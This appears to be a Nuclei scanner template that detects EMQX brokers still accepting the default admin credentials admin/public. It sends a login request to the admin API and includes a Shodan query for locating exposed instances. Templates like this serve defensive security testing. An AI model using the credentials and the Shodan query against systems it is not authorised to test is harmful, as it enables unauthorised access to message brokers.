id: emqx-default-login

info:
  name: Emqx Default Admin Login
  author: For3stCo1d
  severity: high
  description: Emqx default admin credentials were discovered.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    shodan-query: http.favicon.hash:"-670975485"
  tags: emqx,default-login

requests:
  - raw:
      - |
        POST /api/v4/auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {"username":"{{user}}","password":"{{pass}}"}

    attack: pitchfork
    payloads:
      user:
        - admin
      pass:
        - public

    matchers:
      - type: dsl
        dsl:
          - body == "{\"code\":0}"
          - status_code == 200
        condition: and

# Enhanced by mp on 2022/03/28
